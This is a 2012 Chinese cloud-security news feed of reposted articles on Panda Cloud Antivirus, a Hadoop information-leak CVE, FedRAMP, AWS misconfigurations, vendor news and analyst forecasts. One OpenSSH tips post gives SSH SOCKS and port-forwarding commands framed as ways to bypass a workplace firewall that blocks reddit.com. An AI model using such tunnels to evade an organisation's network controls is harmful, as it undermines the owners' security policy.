Panda云杀毒软件2.0增加了其杀毒后,移除所有恶意软件痕迹。此外,它对系统系能的影响较低,在即时扫描方面的速度比程序的早期版本快50%以上。Panda安全高级研究顾问Pedro Bustamante说:“Panda杀毒软件的新版本提高杀毒率并减少了内存占用,感谢我们的beta测试者社区的有益反馈,我们又一次改善了产品,提供最强大的PC保护并在杀毒时对PC性能的影响降到最低。”

该公司表示,Panda云杀毒软件专业版“包括免费版加一个新的基于社区的智能防火墙,自动阻止入侵企图和数据泄露,自动管理应用程序权限,最大限度地减少用户干预。” Panda表示,新的防火墙采用了入侵检测系统,以使应家庭、工作或公共网络等不同的类型。

基于进算和虚拟化/精简型客户端,是“轻量级”基于云的防病毒软件的未来吗?它会不会通过企业级得安全测试?让我们拭目以待。

免费版本下载地址:http://www.cloudantivirus.com

News stories from Wednesday 11 July, 2012

Favicon for 云安全 18:03 Apache Hadoop爆信息泄漏漏洞 » Post from 云安全 Visit off-site link

Hadoop大潮正在逐渐席卷所有美国的垂直行业,包括金融、传媒、零售、能源、以及制药等。Hadoop在树立大数据概念的同时,还对海量数据进行实时分析,并从分析得出的数据发现趋势,以提高企业赢利的能力。

Apache Hadoop作为开源数据管理软件主要用来在分布式环境中的分析大量的结构化和非结构化数据。Hadoop已被用在包括Yahoo,Facebook,LinkedIn和eBay等众多流行的网站之中。

但近日Cloudera的Aaron T. Myers发现了Hadoop存在信息泄露漏洞,此漏洞Bugtraq ID: 54358,CVE: CVE-2012-3376,此漏洞属于设计错误。漏洞波及远程用户,本地暂不受影响。Apache Hadoop 2.0.0-alpha在实现上存在信息泄露漏洞,成功利用后可允许攻击者获取敏感信息,这可能有助于进一步入侵。

漏洞是在2012年7月6日发布的,而补丁也同时释出,目前供应商已经公布可用更新。

延伸阅读

Apache Hadoop 2.0 alpha 版是5月23日发布的,此版本包含很多新的很重要的功能:

除了新功能以外还有一些重要的改进,例如 HDFS Snapshots  auto-failover for HA NameNode, 另外在稳定性和性能方面都有提升。

原文链接:securityfocus

News stories from Wednesday 04 July, 2012

Favicon for 云安全 21:17 超越安全:OpenSSH身怀绝技 » Post from 云安全 Visit off-site link

OpenSSH是Linux上重要的远程管理工具,以安全著称。相信大多数用户已经熟知OpenSSH的使用,如使用SSH进行远程连接,使用SCP、SFTP复制文件等。但是OpenSSH的威力远不止此,下面我们将为您予以展示。

1.X11转发

使用-X选项,可以在本地显示远程Linux上的GUI程序。登录到远程系统,并启用X11转发可以使用以下命令:

  1. ssh -X user@host 

当然,目标系统配置文件/etc/ssh/sshd_config的X11Forwarding参数应被设置为“Yes”,OpenSSH守护进程也应运行。

2.穿越防火墙

在公共网络中,要提防类似于Firesheep的恶意攻击。一个非常好的安全方法就是使用SSL/HTTPS加密,而不使用明文发送信息。

我们还有另一种选择。如果我们想避开配置为不允许使用HTTP/SMTP协议的防火墙,并建立SSH安全通道,可以使用以下命令:

  1. ssh -ND 9999 user@hostname 

端口可以任意调整,以避免与其他服务冲突。

3.执行远程命令

不必登陆,也可以在远程系统上执行命令。例如,可以用以下命令检查磁盘空间:

  1. $ssh host df 

我们甚至可以使用管道,例如:

  1. $ dd if=/dev/dsp | ssh -C user@host dd of=/dev/dsp 

4.端口转发

现在我们来讨论一下端口转发的话题。OpenSSH端口转发分为本地端口转发和远程端口转发,它们的区别在于端口映射的方向。我们利用端口转发,可以轻而易举的绕过防火墙。例如,假定你所在的工作网络不允许访问reddit.com。请运行:

  1. # ssh yourserver -L 80:reddit.com:80 

这样我们就可以通过“yourserver”间接访问reddit.com。如果使用-g参数,就可以允许工作区内的其他计算机通过你的计算机访问reddit.com:

  1. # ssh yourserver -L 80:reddit.com:80 -g 

5.SSH文件系统

通过FUSE项目和sshfs项目,我们可以讲远程SSH挂载到本地。在Mac平台可以使用Fuse4x

可以使用如下命令简化SSHFS的安装:

  1. $ sudo port install sshfs 

我们可以使用如下命令挂载:

  1. $ sshfs remote-host: local-mount-directory 

OpenSSH还有许多强大的功能有待于我们挖掘,欢迎大家提出自己的见解。(张志平/编译)

参考链接:SSH: More than secure shell

OpenSSH Tips and Tricks: Beyond Secure Shell

Howto use SSH local and remote port forwarding

News stories from Wednesday 27 June, 2012

Favicon for 云安全 22:32 云计算服务将统一标准 » Post from 云安全 Visit off-site link

联邦风险和授权管理项目,也称为 FedRAMP,将会采用一个"cloud-first"政策,这样会使云服务提供商(CSPs)实现基本的安全需求标准化,比如说谷歌和微软,在签订政府的合约之前,将不得不聘请第三方评估机构来验证:公司的云服务是否满足基本的云安全要求。

这次改革的目的,第一是要提高IT领域的采购计划,第二,这也是在政府转移计算机服务的进程之中,比如说电子邮件系统、 基于云计算的系统。政府的技术项目在最近几个月已经关闭,因为它们的运行已经超过了预算而且落后于正常的日程安排,所以政府提高了IT行业的安全性标准的优先级,这样做的主要目标是要建立一个统一的安全框架,以便制定的规则和政策能在多个项目之间顺利的执行。

项目将如何工作?

此项目将会使云产品和云服务的安全性标准化,并加速其通过。目的是要设置一个政府能够完全掌控的云安全程序,这也就意味着,供应商在对云计算的项目进行投标时,不用再重复云计算服务安全性的审批过程了。

在这项经由第三方评估机构认可的列表中,包含了超过 160 个安全控件,来帮助企业进行安全性的身份验证,其中就包括垃圾邮件筛选器和加密标准。

项目的优势是什么?

  • 减少评估多个机构之间相同的的云计算产品的冗余性。对于公司来说,卖给政府产品的时间会大大的缩短。
  • 增加重复使用现有的跨机构的安全评估。
  • 节省大量成本、 时间和资源。
  • 增强了政府和云服务提供商 (CSPs) 之间的透明度。
  • 提高了联邦安全授权过程的可信赖性、可靠性、一致性和质量。

该项目是由公众服务管理者参与管理,它也是国土安全部的管理的一部分。如果该项目能成为云计算服务安全的一项标准,相信不仅仅是对为政府工作的云服务提供商(CSPs)甚至对整个行业来说,都是值得期待的,那将是云计算领域的一场伟大的胜利。相信不久的将来,我们就会看到这是不是一个很好的项目。

By Rick Blaisdell / RicksCloud

原文链接:Single Standard For Cloud-Computing Services

王鹏/编译

Favicon for 云安全 17:11 你需要了解的云安全 » Post from 云安全 Visit off-site link

在过去一年中,我们看到索尼以及Epsilon公司遭遇了重大安全泄露事故,但在这些数据泄露事故中,云环境并不是攻击中的薄弱环节。

有些人认为Epsilon是电子邮件营销服务供应商(换句话说,就是SaaS公司),所以这次泄露事故与云环境脱不了干系,但这次攻击中,攻击者使用的是传统的钓鱼攻击来获取对电子邮件服务器的访问权限,而不是利用管理程序漏洞。

云供应商(例如Drophbox和Google)当然存在自己的问题,但与云相关的问题主要涉及系统中断,而不是数据泄露。随着越来越多的企业资源转移到云环境,我们将不可避免地听到更多与云计算相关的事故,但我们仍将看到更多针对企业内部资源的攻击事故。

这并不意味着投资于云环境的企业可以松一口气,基于云的应用程序安全测试服务供应商Veracode公司研究副总裁Chris Eng表示:“攻击者目前使用的攻击方法已经很够用,他们只需要使用相同的SQL注入攻击就可以成功发动攻击,而不需要花大量时间来开发新的攻击方法,”

黑客并不是将云视为目标

通过索尼数据泄露事故,我们发现一个令人不安的趋势:攻击者并不是将云视为目标,而是将其作为一种资源。攻击者使用偷来的信用卡来租赁Amazon EC2服务器,然后对索尼公司发动攻击。

“云计算向合法企业提供一切服务,同样也提供给攻击者,”安全监控公司Vigilant公司高级情报专家Scott Roberts表示,“越来越多的网络犯罪分子租用云基础设施来安装垃圾邮件程序(spambot)或者打造恶意软件命令以及控制基础设施。每个月只需要花50美元或者60美元,攻击者就可以利用很好的云资源。” 攻击者可以将这些廉价的基础设施加入低成本、自动化恶意软件工具包,并可以租借僵尸网络来发动攻击。

虽然攻击者目前没有专门针对云环境,但大多数专家认为他们很快将开始攻击云环境,毕竟越来越多的企业资源开始转移到云环境。“云环境本身已经是一个诱人的目标,”Eng表示,“在云环境中,数据非常集中,你只要瞄准一个供应商,就可以攻击多个企业。”

当问及为什么要抢银行时,Willie Sutton表示(虽然后来他否认了这个说法):“因为钱在那里。”现在,最重要的企业资产仍然位于企业防火墙内,以后呢?可能会转移到云环境中。

为什么云环境容易受到攻击

云环境的优势在于,主要云供应商有责任保护他们的环境,如果Amazon或者谷歌遭遇泄露事故,他们的业务将受到严重影响。

主要云供应商都清楚这一点,他们都在努力采取措施避免事故的发生。Amazon网络服务发言人Rena Lunak表示:“很早以前,网络就已经不再是物理孤岛,企业逐渐发现需要连接到其他企业,然后有了互联网,企业网络开始与公共基础设施相连接。”

为了减轻风险,很多企业正采取措施来隔离他们的流量,例如使用多协议标签交换(MPLS)链接和加密。“亚马逊在云环境对网络采取了相同的方法:我们保持数据包级的网络流量隔离,并采用行业标准的加密,”她表示,“因为亚马逊的虚拟私有云允许客户建立自己的IP地址空间,客户可以使用他们已经非常熟悉的工具和软件基础设施来监控和控制他们的云网络。”

这些听起来都很不错,但是一些常见错误(例如糟糕的身份验证方法或者开放管理端口)可能让供应商的安全保护措施付诸东流。

“迁移到云环境存在的一个问题是,你需要远程管理你的资源,”云安全供应商CloudPassage公司首席执行官Carson Sweet表示,“很多很多公司没有关闭管理端口,攻击者就是利用了这一点。”

云环境如何影响你的内部网络?

Sweet指出,云环境中糟糕的安全做法可能会影响企业内部网络的安全。很多担心云威胁的企业根本不会将企业最重要的数据转移到云环境中。

在CompTIA调查的企业中,有82%的企业相信云供应商能够提供一个安全的环境,58%的企业不会将关键企业财务信息转移到云环境,56%的企业不会将信用卡数据放入云环境,将近一半的受访者拒绝将机密知识产权、商业机密或者人力资源信息放入云环境。

这里的逻辑很简单:将机密数据放在企业防火墙后面更加安全。然而,这个逻辑有一个致命的缺陷。

Sweet谈到曾经CloudPassage的一名客户(不愿意透露姓名)在云环境中部署了开发服务器,攻击者将一个工具包放到一台虚拟服务器中,当开发人员发现服务器中丢失了一些东西,于是他们将服务器带回企业环境来重新镜像,不幸的是,攻击者的攻击工具包感染了整个网络。Sweet表示:“如果你不注意的话,虚拟机可能会成为木马。”

请确保API密钥的安全

我最常听到的云安全问题是API密钥的安全。大多数企业使用API密钥来访问他们的云服务,这些密钥非常重要。

“API密钥是一个巨大的问题,”Sweet表示,“如果我知道你的API密钥在服务器的位置,我能够拿到它们,然后我就可以进入你的云环境。”

API密钥必须受到保护,我们经常会看到IT管理员将这些密钥通过电子邮件来发送给另一名管理员,或者将密钥存储在并不难被发现的配置文件中。

API密钥必须保存在一个安全的加密的位置,并且进行定期检查,必须确保只有具有正当理由的人才能访问这些密钥。另外,云经纪人可以帮你保管密钥,但你必须意识到你正在将云安全的关键部分外包给第三方。

询问云供应商的10个问题

在对云服务供应商进行评估时,请一定要问以下十个问题:

1. 你是否使用安全开发生命周期来开发你的服务?

2. 你能否证明或者提供渗透测试结果?

3. 你部署了怎样的数据保护政策?

4. 你的数据隐私政策是什么?

5. 你如何执行这些不同的政策?

6. 安全涵盖在你的SLA中吗?如果没有,为什么?

7. 你如何备份和恢复数据?

8. 你如何加密动态数据和静态数据?

9. 你如何将我的数据与别人的数据分开?

10. 我对你的日志信息有怎样的能见度

本文来自:网界网

News stories from Thursday 21 June, 2012

Favicon for 云安全 17:27 自2007年起云服务宕机损失超过7000万美元 » Post from 云安全 Visit off-site link

6月20日消息,据国外媒体报道,日前有专家称,自从2007年开始,13次著名的云服务宕机导致了568小时的服务中断,造成了超过7170万美元的经济损失。每年云服务的中断时间为7.5小时,可用率为99.9%,这个可用性与预期的99.999%相差很远。与之相比较,一个现代化都市的电力中断时间不超过每年15分钟。研究人员的这次调查是基于Twitter,Facebook,亚马逊,微软,谷歌,雅虎和Paypal等机构而进行的。

随着云服务对于政府机构和商业机构的吸引力越来越大,提供可靠的服务就显得十分重要,特别是在承担重要任务时。然而,云服务在可靠性方面的缺失还不为业界所知。研究人员称,云服务中断每小时的经济损失各不相同,例如旅行服务提供商Amadeus的小时损失为89000美元,而Paypal的小时损失为225美元。谷歌,微软和亚马逊的小时损失为200美元。

除了经济损失,持续数天,甚至数周的服务中断会影响百万用户。

译文来自:赛迪网

本文来自:CIO

News stories from Friday 15 June, 2012

Favicon for 云安全 00:43 使用亚马逊云服务最容易犯的5大错误 » Post from 云安全 Visit off-site link

现在非常多的人在使用亚马逊的云服务,但是很多人在使用的过程中,都必可避免的发生了一些错误。

以色列公司 NewVem根据对亚马逊用户的研究,公布了在亚马逊云上容易犯的5大错误。

1. 留下数据库服务器IP端口用来打开域。通常没有理由要从网上直接访问数据库服务器。数据库中的条目应该通过Web或应用服务器,作为一个缓冲使用。

2. 开放访问AWS的所有内部服务器IP端口。这是很容易犯的一个错误,但损失却是十分大。如果一个安全组被配置为允许访问范围为10.0.0.1/8的IP,它可能就会发生。

3. 关闭开放所有IP地址的IP端口。最好的做法是保持开放的端口到最低限度,并除了只有那些真正需要互联网访问的服务外,限制从外界访问。

4. 允许公共互联网上的IP地址访问关键IP端口。类似上面提到的数据库端口,这些端口如果是从非信任的IP地址访问,它们可能会有暴露你云环境的风险。关键的IP端口应该锁定,限制只能从私人网络访问。

5. 公开访问的Amazon Machine Images。AMI往往含有敏感数据,所以让它们半公开是有风险的,但这又无时无刻都在发生。经验之谈:当建立一个AMI时,请务必将策略设置为似有。(相反,如果你想分享AMI,确保敏感数据被节录。)

Newvem的市场营销和业务发展副总裁Cameron Peron说,这些错误大多只是失误。他通过电子邮件表示,当AWS进行改变或缩放时,几乎所以这些问题都会造成混乱。

本文来自:Gigaom

News stories from Monday 11 June, 2012

Favicon for 云安全 16:57 云安全公司Qualys准备上市 股票代码QLYS » Post from 云安全 Visit off-site link

北京时间6月9日消息,据外国媒体报道,美国云安全公司Qualys近日刚刚提交了IPO(首次公开募股)文件,此举也使得Qualys成为最近一家力图上市的安全公司。

Qualys公司主要帮助企业的IT部门遵守与其行业相关的政策和法规,同时也提供商业应用帮助企业监控和阻止黑客的攻击。Qualys的主要产品都是基于云技术,目前云技术已经成为研发安全软件的一项主要技术,因为这样的软件便于上传和安装。Qualys旗下的Qualys卫士云平台(QualysGuard Cloud Platform)可以让企业主监控恶意软件,并扫描任何危险的应用;另外,该平台还拥有一个仪表板,用来检测和组织企业可能存在漏洞。

Qualys目前在全球范围内已经拥有5700多个客户,该公司2011年的收入为7620万美元,在今年第一季度,Qualys的收入已经达到2120万美元。目前Qualys仍未选定到哪家交易所发行股票,但已经将股票交易代码确定为“QLYS”。

就在此前不久,另一家安全公司Palo Alto Networks也提交了上市申请材料,该公司主要是一家生产防火墙的公司,但其防火墙只能帮助企业监控和阻止部分应用。

本文来自:搜狐IT

News stories from Thursday 07 June, 2012

Favicon for 云安全 23:14 【大会回顾】云计算时代:安全何去何从 » Post from 云安全 Visit off-site link

导语:2012年5月23-25日召开的第四届中国云计算大会已经成功落下帷幕,业界就云计算诸多方面的内容进行了热烈讨论,今天我们整理了部分嘉宾关于云安全方面的演讲,供各位读者品鉴。

“云安全”是“云计算”技术的重要分支,已经在反病毒领域当中获得了广泛应用。云安全通过网状的大量客户端对网络中软件行为的异常监测,获取互联网中木马、恶意程序的最新信息,推送到服务端进行自动分析和处理,再把病毒和木马的解决方案分发到每一个客户端。整个互联网,变成了一个超级大的杀毒软件,这就是云安全计划的宏伟目标。

云安全的意义

道里云公司创始人、首席执行官 毛文波

对于安全的意义,道里云公司创始人、首席执行官毛文波表示,云安全是一种服务诚信,云计算比拼的是服务质量。云计算必须依靠IT用户付费维持并发展,云安全问题不解决,用户就不会付费使用,云计算也就无法发展壮大。

云计算带来的挑战

云安全联盟中国分理事会理事,绿盟科技首席战略官赵粮

在本次云计算大会上,云安全联盟中国分理事会,绿盟科技首席战略官赵粮表示云计算时代的到来带来了三方面的挑战:一是新技术带来新漏洞和新型攻击;二是云计算如何才能保证效力、提高效率;三是如何充分利用云计算技术和思想来创建或变革现有的安全防护技术和产品。

赵粮表示,云安全受到的威胁有很多,威胁本身的变化也非常快,可能在几天范围内就会发生改变。对此,我们要在安全上体现集约化、服务化、智能化、主动性和生态化五个方面的特征。

信任比黄金更为宝贵

上海优刻得信息科技有限公司CEO 季昕华

上海优刻得信息科技有限公司CEO季昕华认为,安全是云计算最大的忧虑,同时也是云计算最大的挑战。从云计算落地的角度来看,季昕华认为“信任比黄金更为宝贵”,如何让用户信任云计算、云计算运营商已经云计算运营商的能力是解决安全问题的根本。

季昕华表示,云计算是社会分工的必然结果,云计算的价值要更省、更快、更强,云计算面临的最终问题是安全。

季昕华说,目前云安全主要受到外部黑客攻击、内部员工非法获取、恶意用户越权这三个方面的困扰。在这种情况下,他表示云计算运营商的中立是用户信任的前提、决心是用户信任的关键、能力是有能过户信任的基础。信任会比黄金更可贵,建立可贵的环境,才能够得到客户的信任。

欲了解详情,请点击:第四届中国云计算大会

News stories from Wednesday 30 May, 2012

Favicon for 云安全 17:03 Google寻求安全标准 努力成为 “数据银行” » Post from 云安全 Visit off-site link

鉴于现在越来越多的公司和政府机关开始依赖Google公司的云服务,该公司也开始极力向广大用户证明其安全性,比如Google Apps。在一次采访中,Google安全部门的主管就把他们公司跟早些年的银行系统进行了比较,“它就像几百年前的银行运行模式。银行说服人们把钱存到他们那里,然后人们就从床垫下把钱拿出来存到银行里。”

而Google公司为了达到这样的目的,已经进行了好几轮的内部安全测试,大部分都是按照有名的ISO 27001标准进行的。但是,这个传统的标准模式还是引起了一些问题,例如一个传统的软件并不支持云环境的数据交换。

但是就Google这样的举措还是遭到一些人的质疑。它的对手微软公司就已经把注意力集中放在了一些可能潜在的安全问题上:作为世界最大的广告公司,Google兼带在贩卖他们的Google Apps中的软件。

同时,来自美国的一个检察长也表达了他的观点,他认为Google提出的新的个人政策将会影响Apps产品的使用。但在Google方 面,他们表示目前他们已经吸引了4百万家公司,至于个人隐私方面的问题仍还不能给出明确的答复。

本文来自:cnbeta

Favicon for 云安全 01:11 Gartner:不要完全相信你的云供应商 » Post from 云安全 Visit off-site link

Gartner的副总裁和安全分析师John Pescatore认为,用户不应该依赖其云服务提供商的安全功能来保护其最关键的数据。

敏感信息需要被保护,Pescatore说:“当你使用云计算服务时,有些事情你可以相信你的云供应商,但关键业务数据和控制监管类的信息,仅依靠基础设施来保护是不够安全的。”

安全仍为公司云战略中最受关注的问题,Pescatore说有办法减轻企业对于安全方面的担忧。他说,关键是要有一个专门保护云应用程序、数据或工作负载而设计的安全规定。

一些云服务共隐身刚将在其基于云的存储产品上提供加密服务,但是也有第三方应用程序可以为客户提供加密服务、分布式拒绝服务(DDoS)防护,并访问专门为云部署量身定制的控制措施。

众多供应商提供的“网关”产品,让用户和云供应商监视那些数据被放入云,以确保恶意的数据或应用程序不会渗透到用户的系统。

Pescatore说云安全目前处于一个起步阶段。他建议企业先使用私有云,确保安全第一,再进入混合云和公共云领域。Pescatore表示,有进程来保护虚拟环境免受外界攻击是非常重要的。他表示,预见系统中的变更控制和漏洞,包括保障业务流程的体系架构和新账户、域和虚拟机的资源调配。

Pescatore说,不能奢望获得万无一失的安全保障,要保护敏感信息,并只将敏感度较低的数据放置在本地的云上。

Pescatore说,云安全的重点应该是保护云得进程。创建云安全策略,然后确保它们在整个云部署实施,并坚持下去。他说,这些漏洞是创建时有政策上的失误或没有实施安全控制。

对于低级别的安全要求,云服务供应商(无论是基础设施,或是作为服务端的软件),通常都有自己的安全功能。AWS是执行FISMA的标准,另一个云供应商FireHost则是符合PCI标准。至少,Pescatore说,用户应该看到他们的供应商是ISO 27001、SOC 2 或 SOC 3 认证的提供者。除此之外,以及特别是敏感信息,也要使用第三方安全产品。

本文来自:Network World

News stories from Monday 28 May, 2012

Favicon for 云安全 17:41 英特尔发布云密码管理服务 以抗衡赛门铁克 » Post from 云安全 Visit off-site link

5月25日消息,据国外媒体报道,英特尔公司发布了一项基于云的密码管理服务,这项服务已经被Salesforce.com应用于其网站上了。

二月份的时候,英特尔发布了单点登录(Cloud SSO)的测试版,这已经经过了20多家的公司测试。英特尔云的身份和安全产品管理主管Vikas Jain说,“我们竭力使此项服务变得更加大众化,我们相信已经研发出与Symantec and Symplified公司相似的产品。”

Cloud SSO为公司提供了一个在线的控制台(online console),这个控制台是用于提供对每位职员都适用的选择应用服务的功能。对于那些使用苹果 iOS和Android智能手机以及平台的而言,这项服务是用于发布之前口令的移动应用程序。

对于那些想将Cloud SSO整合于on-premise身份库(identity repositories)的用户,如,Active Directory和LDAP,英特尔也提供了一个名叫身份桥(identity bridge)的组件,这个组件将配置在用户的on-premise服务器中。Vikas说,“身份桥会用英特尔的单点登录服务连接企业内部的数据,而针对企业库的所有统一认证管理都会完成。”

除了将基于云的密码管理服务整合到Salesforce,英特尔也已经将Cloud SSO与从最近内核处理器中发现的基于芯片的身份保护技术(chip-based Identity Protection Technology)相连接。这种整合使得用户在登录在线服务时不必键入Cloud SSO产生的前密码,因为密码锁是存储于个人电脑的芯片统一认证管理数据库中的。

Vikas说,“这你相当于得到了一个协助第二因素统一认证管理(second-factor authentication)的硬件,这比直接向浏览器键入密码要安全多了。

”Cloud SSO开始售价是每月5美元,这其中包括一个应用的无限制号码和24小时支持服务。

本文来自:赛迪网

News stories from Friday 18 May, 2012

Favicon for 云安全 18:40 Forrester安全报告:5大上升和5大消亡技术 » Post from 云安全 Visit off-site link

安全技术的兴起和消亡十分正常,Forrester在其TechRadar报告中列举了5个它认为处于上升阶段的技术和5个它认为正在消亡的技术。

以下是Forrester选出的5大热门安全技术:

1. 配置审计工具

根据Forrester的报告,这一技术虽然目前还未看到大量的采用,但是在未来三到五年内将会被广泛采用,因为数据泄露事件正日益增多,监管环境也存在缺陷,因此这一技术“有潜力成为企业安全组织内无处不在的技术。”

2. 恶意软件分析

该技术在事件响应和漏洞管理中提供分析服务,“此类工具的采用预计在未来三到五年内将会出现增长”,部分原因是“国家资助的或者高级持续威胁(APT)”需要对“网络流量进行更细致的检查。”

3. 网络加密

Forrester报告称,虽然在基础设施设备如路由器和交换机上存在网络加密,但是对单独设备的网络加密才刚刚开始,因为很多设备都需要加密并保护数据安全。未来一到三年这一技术将发展到下一阶段,虽然不存在合规压力,但这项技术还是只会被需求最急迫,最大型的企业所采用。

4. 预测威胁建模

这个相对较新的概念要求分析如何利用预设性建模威胁来保护重要数据。在三到五年内,这项技术就会进入下一阶段,不过“目前的威胁建模工具的成本和复杂性对于这一新技术的采用来说是一种障碍。”

5. DDoS迁移控制

虽然市场上的防DDoS产品早已有之,但Forrester指出,这个市场直到现在还是非常小。然而由于政治黑客的不断涌现,Forrester预测,“DDoS保护这一市场预计将会在未来三年内出现增长”,尤其是作为一种服务。

以下5个技术是Forrester认为可能会在未来几年内消亡的。

1. 网络访问控制(NAC)

Forrester认为,单独的NAC产品市场很有可能会在未来五到十年内逐渐消亡。(不过Forrester也认为,在安全软件套件或基础设施安全里打包出售的NAC可能还有些前景。)NAC为何前景不妙?Forrester称,只有10%的技术决策者会在未来12个月内实施这一技术,因为“此类解决方案在部署、扩展和管理上过于复杂。”目前已有一些NAC架构,还有一些硬件和软件方法,而“所有方法都需要与网络基础设施组件集成。”Forrester认为,“NAC并不能阻止为了钱或其他原因想要泄露机密的恶意内部人士。”

2. 安全文件传输(作为一种单独设备)

在商业合作伙伴之间安全地传输和共享文件的需求正在高涨,但是在未来三到五年内这种需求会更多地以云服务的方式出现,而不会依靠单独的设备来进行。

3. 统一威胁管理(UTM)

虽然被广泛部署在小型企业和分支机构中用于DSL广域网实施,但UTM和集成了防火墙和入侵检测等更多功能的新型网关相对独立的发展让UTM显得“过时了”。Forrester认为,UTM在一到三年内有可能满足竞争性挑战,成为“企业就绪的”,但它同时也承认,UTM可能会在零售商店“获得比较长期的成功。”

Forrester称,以下两种技术正在“逐渐消亡”。

4. 传统的网络防火墙

传统的防火墙市场“将会随着下一代防火墙(NGFW)技术的普及而出现停滞”。Forrester称,未来五到十年,NGFW将最终取代今天的传统防火墙,但是这些老旧设备在未来五年内仍然还是网络防御的主要设备。

5. 网络入侵防御(独立产品)

Forrester认为,单独的入侵防御系统(IPS)市场尽管在一些全球最大型企业中获得了成功部署,但是它仍处于衰落之中,“将会在未来五到十年内逐渐淡出”,因为包含有IPS功能的多功能网关和防火墙,尤其是NGFW,将会取代单独的IPS设备。

本文来自:网界网